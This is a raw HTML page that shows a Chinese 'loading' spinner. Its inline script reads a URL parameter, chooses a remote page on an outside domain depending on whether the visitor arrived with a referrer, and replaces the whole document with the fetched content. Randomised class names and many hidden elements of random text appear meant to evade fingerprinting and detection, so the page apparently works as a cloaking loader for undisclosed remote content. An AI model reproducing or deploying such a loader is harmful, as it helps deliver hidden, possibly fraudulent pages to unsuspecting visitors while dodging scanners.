<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cpR0BNvh6j {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cpR0BNvh6j .CRk9bQ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cpR0BNvh6j .content {
            line-height: 50px;
            text-align: center
        }

        .cpR0BNvh6j .img {
            width: 100%
        }

        .cpR0BNvh6j .vlFG5cn1b {
            text-align: center
        }

        .cpR0BNvh6j .vlFG5cn1b span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cpR0BNvh6j .vlFG5cn1b span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cpR0BNvh6j .vlFG5cn1b span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cpR0BNvh6j .vlFG5cn1b span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cpR0BNvh6j .vlFG5cn1b span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cpR0BNvh6j .vlFG5cn1b span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cpR0BNvh6j .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function paJAod9Mvi8(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kePAlXJ = paJAod9Mvi8('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kePAlXJ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kePAlXJ +".html?a=share";
		}
		
        JDgrW6LG=url+"#"+new Date().getTime();
        JDgrW6LG && function() {
            $.get(JDgrW6LG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >mZe7xZwZFZG6KsTZEwFWjf5dA</h1>
<h1 style='display:none' >mZe7xZwZFZG6KsTZEwFWjf5dA</h1>
<li style='display:none' >YTTQ2Q8TVjIwgZwvpMd</li>
<b style='display:none' >zAXEdDoLcTdBa4ArRYEIWwrllJwhvaxBMR67AgJYJTcDYp0SwgH1jK4PRmkHz1mqvMe7oXP</b>
<li style='display:none' >YTTQ2Q8TVjIwgZwvpMd</li>
<li style='display:none' >YTTQ2Q8TVjIwgZwvpMd</li>
<ul style='display:none' >aS1qhR7HRPum8gG02BqEpNhP5VJb6djWaVzzCIuKrNyHneR8Gcb3HtN</ul>
<img  src='' style='display:none'>
<div style='display:none'>XcGN9Gn3Lzdvk5LqyZwGSYpwCEgSnGxFE9L1wBTTVIHO1UKwL9qpkoMRY21wKyPoI9ZGyIBIaugz</div><div class="cpR0BNvh6j">
    <div class="CRk9bQ">
        <div class="vlFG5cn1b">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>c7bXTSvaxuQOVyocLUj70RVhrJ7</p>
<b style='display:none' >HimV5QMlwRbrojBV6047fzTwRl91QLUCF56XFWcwpLcwDN</b>
<li style='display:none' >miWAL6oNhmRQJuXYm0mRpO1I6e29Dm2bv21n9NwLHVdFhzSjIo1rTRAPFoIfqre6REAlENxsJD2s50z4TOhcB4t9X8WoIfF3W1J6</li>
<a  href='#' style='display:none'>UKWys9kx7EuSvVjvDW3jHtkchnbYP8QqDRwGZ8lIkvw4bYKAsBJQIjnJQGd8ERLSbqGVALbCZNi1</a>
<a  href='#' style='display:none'>UKWys9kx7EuSvVjvDW3jHtkchnbYP8QqDRwGZ8lIkvw4bYKAsBJQIjnJQGd8ERLSbqGVALbCZNi1</a>
<li style='display:none' >miWAL6oNhmRQJuXYm0mRpO1I6e29Dm2bv21n9NwLHVdFhzSjIo1rTRAPFoIfqre6REAlENxsJD2s50z4TOhcB4t9X8WoIfF3W1J6</li>
<img  src='' style='display:none'></body>
</html>